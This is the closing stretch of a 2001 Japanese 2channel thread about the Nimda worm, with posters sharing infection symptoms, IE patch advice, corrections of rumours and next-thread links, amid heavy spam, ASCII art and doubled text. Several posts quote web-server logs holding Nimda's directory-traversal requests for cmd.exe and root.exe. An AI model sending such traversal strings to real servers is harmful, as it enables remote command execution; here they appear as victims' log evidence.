一応、念のために説明すると*.emlはメールファイルのことで
『*.eml』の意味は*.emlという名前のファイルではなく.emlと言う拡張子
の付いたファイル全部検索しろと言う意味で、身に覚えのない数以上
のファイルが検索されたら感染を疑ってみるべきでしょう。
『*.eml』の意味は*.emlという名前のファイルではなく.emlと言う拡張子
の付いたファイル全部検索しろと言う意味で、身に覚えのない数以上
のファイルが検索されたら感染を疑ってみるべきでしょう。
936 : :01/09/19 15:58 ID:/hOBMOFw
バージョン情報の更新バージョンがSP2になっているんですが、
これは大丈夫ってこと?
これは大丈夫ってこと?
938 : :01/09/19 15:59 ID:gTVqO6AI
関係ないけど、マイドキュメント内に
capt.1000253440terrorist_attacks_xnyr316
とかいうファイルがあってびびった。
capt.1000253440terrorist_attacks_xnyr316
とかいうファイルがあってびびった。
939 :LINUX使い:01/09/19 15:59 ID:tLF66/ns
931はあほ。死ねよ!
940 :森の妖精さん:01/09/19 15:59 ID:LJxX308I
いま、自宅のサーバーのアバッチのエラーログ
みてたら、攻撃されてるわされてるわ。笑
みてたら、攻撃されてるわされてるわ。笑
941 :ぺ ◆lPYiMAEY :01/09/19 16:00 ID:.iBHXJik
>910
http://www.microsoft.com/japan/ie/downloads/
ここに逝ってください
>924
8月15日だったかな。
漏れは20日頃にアップデートしたよ。
でもWindows Updateでは表示されなかったんで、手動で
ダウンロードしたと思う。
http://www.microsoft.com/japan/ie/downloads/
ここに逝ってください
>924
8月15日だったかな。
漏れは20日頃にアップデートしたよ。
でもWindows Updateでは表示されなかったんで、手動で
ダウンロードしたと思う。
942 : :01/09/19 16:00 ID:zYHPZHs6
943 : :01/09/19 16:01 ID:0/JZu1FA
IE6入れときゃOKかい?
944 : :01/09/19 16:01 ID:JHoJO7iU
おいっ!!!
てめーら、全員初心者板逝けや
てめーら、全員初心者板逝けや
945 : :01/09/19 16:02 ID:ecPQDk4k
946 : :01/09/19 16:03 ID:WkylJWgg
あのDL画面がウイルスだったのか・・・。
うちは初めからIE6だったからいいけど
うちは初めからIE6だったからいいけど
947 : :01/09/19 16:03 ID:JgAOGVbo
age
948 : :01/09/19 16:03 ID:VncxlqhA
ガイシュツだったらすまん
アクセスログに
23:17:52 /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe
23:17:49 /d/winnt/system32/cmd.exe
23:17:56 /scripts/..%5c../winnt/system32/cmd.exe
23:17:55 /scripts/..%5c../winnt/system32/cmd.exe
23:17:50 /scripts/..%5c../winnt/system32/cmd.exe
23:17:47 /scripts/root.exe
23:17:48 /MSADC/root.exe
23:17:54 /scripts/..タッ../winnt/system32/cmd.exe
23:17:52 /scripts/..チ ../winnt/system32/cmd.exe
23:17:50 /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
23:17:56 /scripts/..%5c../winnt/system32/cmd.exe
23:17:51 /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
23:17:57 /scripts/..%2f../winnt/system32/cmd.exe
23:17:53 /scripts/..タ/../winnt/system32/cmd.exe
23:17:48 /c/winnt/system32/cmd.exe
23:17:54 /scripts/..チ・./winnt/system32/cmd.exe
こういうのがあったけど、これが感染したってこと?
アクセスログに
23:17:52 /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe
23:17:49 /d/winnt/system32/cmd.exe
23:17:56 /scripts/..%5c../winnt/system32/cmd.exe
23:17:55 /scripts/..%5c../winnt/system32/cmd.exe
23:17:50 /scripts/..%5c../winnt/system32/cmd.exe
23:17:47 /scripts/root.exe
23:17:48 /MSADC/root.exe
23:17:54 /scripts/..タッ../winnt/system32/cmd.exe
23:17:52 /scripts/..チ ../winnt/system32/cmd.exe
23:17:50 /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
23:17:56 /scripts/..%5c../winnt/system32/cmd.exe
23:17:51 /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
23:17:57 /scripts/..%2f../winnt/system32/cmd.exe
23:17:53 /scripts/..タ/../winnt/system32/cmd.exe
23:17:48 /c/winnt/system32/cmd.exe
23:17:54 /scripts/..チ・./winnt/system32/cmd.exe
こういうのがあったけど、これが感染したってこと?
今回の騒ぎは「2ちゃんねらー」に限っては今日で解決しそう?
950 :ieie:01/09/19 16:04 ID:kRb7kVxA
ie6はどうよ。やっぱりよさげですか?
951 : :01/09/19 16:04 ID:rJO4rUQE
一番注意して欲しいオサーン達に限って
警告してもうわのそら
警告してもうわのそら
953 :ななしーさん:01/09/19 16:05 ID:FF9YYw4I
ie6でも実行すれば感染しちゃうらしい。
てかメール経由だと感染するのか?
てかメール経由だと感染するのか?
954 :森の妖精さん:01/09/19 16:05 ID:LJxX308I
今もあったよ。まったくなあ。。
[Wed Sep 19 16:01:05 2001] [error] [client 165.76.伏字.250] File does not exist: /
www/htdocs/default.ida
[Wed Sep 19 16:01:05 2001] [error] [client 165.76.伏字.250] File does not exist: /
www/htdocs/default.ida
955 : :01/09/19 16:05 ID:jhDeJex2
>>944
初心者用のスレがあるので、そこを読むと大概は解決できるかと。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662&ls=50
初心者用のスレがあるので、そこを読むと大概は解決できるかと。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662&ls=50
957 : :01/09/19 16:06 ID:gTVqO6AI
959 :名無し:01/09/19 16:07 ID:GEWbAhZY
お祭りワショーイ!!
ネスケはどうよ?
961 :ナナシサソ:01/09/19 16:08 ID:uy8Pfu/w
こっちにも一応。
現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
963 :1:01/09/19 16:09 ID:qXfjSzVU
1
964 :1:01/09/19 16:09 ID:qXfjSzVU
10
965 : :01/09/19 16:09 ID:KUa1jsG2
本当の前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
966 : :01/09/19 16:11 ID:oaR/VUnY
967 : :01/09/19 16:12 ID:m9yCiymc
次スレ、もう立ってるの?
968 : :01/09/19 16:12 ID:jxNp0hS2
中日新聞のサイトではこのウィルスの記事あるのかな?
sp2あててあるけど、みずから確認に逝く勇気ない
sp2あててあるけど、みずから確認に逝く勇気ない
969 : :01/09/19 16:14 ID:Gg8nxNaA
感染したemlファイルをデコードするとどうなるの?
970 :次スレテンプレート:01/09/19 16:14 ID:UPLKrEJ6
■最悪のウイルス登場MSNが配布 その3■
最悪のウイルス登場MSNが配布 その2
http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
最悪のウイルス登場MSNが配布 その2
http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
971 :1000:01/09/19 16:16 ID:qRpus5jE
今だ!1000番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
972 :1000:01/09/19 16:17 ID:qRpus5jE
今だ!1000番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
973 :名無し:01/09/19 16:19 ID:GEWbAhZY
ZDNETのニムダウイルスの詳細記事
http://www.zdnet.co.jp/news/0109/19/e_nimda_m.html
http://www.zdnet.co.jp/news/0109/19/e_nimda_m.html
974 : :01/09/19 16:19 ID:oaR/VUnY
じゃあ、980が次スレたてるってことで。
975 :975:01/09/19 16:22 ID:UPLKrEJ6
975
976 :_:01/09/19 16:22 ID:CqzFKTZs
自分宛にテストメール送ってREADME.EXEがくっついてきたらビンゴ
っていう確認方法はだめ?
っていう確認方法はだめ?
977 :1000:01/09/19 16:22 ID:3dIdB1mI
1000
tyjms
979 : :01/09/19 16:23 ID:B.L/2Ca2
今だ!1000番ゲットォォォォ!!
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´
∧∧ ) (´⌒(´
⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
 ̄ ̄ (´⌒(´⌒;;
ズザーーーーーッ
980 : :01/09/19 16:23 ID:rhA4bL0E
ワクチンまだ?
【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Nimda(ニムダ)」が感染
982 : :01/09/19 16:24 ID:nUNFugdc
っていうか、さっきメール起動したら120通くらいきてるんですが・・・・
983 : :01/09/19 16:24 ID:UPLKrEJ6
984 : :01/09/19 16:24 ID:d.PADzGo
1000
985 : :01/09/19 16:24 ID:6Ah5JbSc
┌────────────────────┐
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
986 : :01/09/19 16:24 ID:/pyIBbxs
1
987 : :01/09/19 16:25 ID:1UJ2cJHQ
988 : :01/09/19 16:25 ID:zIx9bHqk
うおオレも100通来てる・・・
989 : :01/09/19 16:25 ID:6Ah5JbSc
┌────────────────────┐
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
990 :1000:01/09/19 16:25 ID:6Ah5JbSc
┌────────────────────┐
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
991 :1000:01/09/19 16:25 ID:P4hD3jfg
1000げっと!
992 :1000:01/09/19 16:25 ID:6Ah5JbSc
┌────────────────────┐
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
993 : :01/09/19 16:25 ID:KUa1jsG2
本当の前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
994 :1000:01/09/19 16:26 ID:6Ah5JbSc
┌────────────────────┐
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
|┏━━━┓ 郵 便 は が き │
│┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│
│┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││
│┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│
│┗━━━┛ │
│ 赤 │
│ ┏━┓ 羽 │
│ ┃訴┃ 西 北 │
│ ┃ ┃ 二 │
│ ┃状┃ 村 丁 │
│ ┃ ┃ 目 │
│ 谷 ┃在┃ 博 31 │
│ 澤 ┃ ┃ 番 │
│ 動 ┃中┃ 之 16 │
│ 物 ┗━┛ | │
│ 病 一 │
│ 院 様 三 │
│ 一 │
│ 一 │
│ 号 │
│ [][][]-[][][][] │
│┏━━━━┓┏━━━━━┓┏━━━━━┓│
│┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│
│┗━━━━┛┗━━━━━┛┗━━━━━┛│
└────────────────────┘
995 :1000:01/09/19 16:26 ID:1zd4kiYU
1000
996 : :01/09/19 16:26 ID:d.PADzGo
1000
997 : :01/09/19 16:26 ID:KUa1jsG2
本当の前スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
セキュリティ板
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
998 :1000:01/09/19 16:26 ID:1zd4kiYU
1000
999 :1000:01/09/19 16:26 ID:P4hD3jfg
1000げっとだぜ
1000 :1000:01/09/19 16:26 ID:1zd4kiYU
1000。
1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。
1002 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。